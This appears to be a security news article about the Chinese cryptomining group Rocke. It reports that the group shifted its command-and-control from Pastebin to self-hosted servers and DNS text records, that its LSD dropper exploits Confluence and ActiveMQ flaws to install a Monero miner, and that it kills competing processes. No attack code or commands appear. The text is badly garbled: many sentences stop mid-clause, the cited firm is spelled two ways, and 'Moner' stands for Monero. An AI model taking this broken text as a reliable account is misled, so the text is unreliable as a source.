Chinese-speaking cybercrime gang Rocke, that carried out several large-scale
The cybercrime organization was first spotted
In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have changed Command and Control (C2) infrastructure using a self-hosted solution.
The malicious code is used by the hackers to deliver a Moner (XMR) crypto miner that is not detected by almost any antivirus solution.
The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.
“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomaly. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (
The use of self-hosted and DNS records
The group also improved its LSD dropper by adding the malicious code to exploit CVE-2016-3088 in ActiveMQ servers.
In order to ensure that only its miner is running on the infected machine, the group attempt to kill any other processes with high CPU usage. The LSD malware analyzed the MD5 hash of the files to avoid killing its instance running on the system.
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.
“It is expected that the group will continue to exploit more vulnerabilities to mine additional
Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.
(SecurityAffairs – Rocke cybercrime gang, mine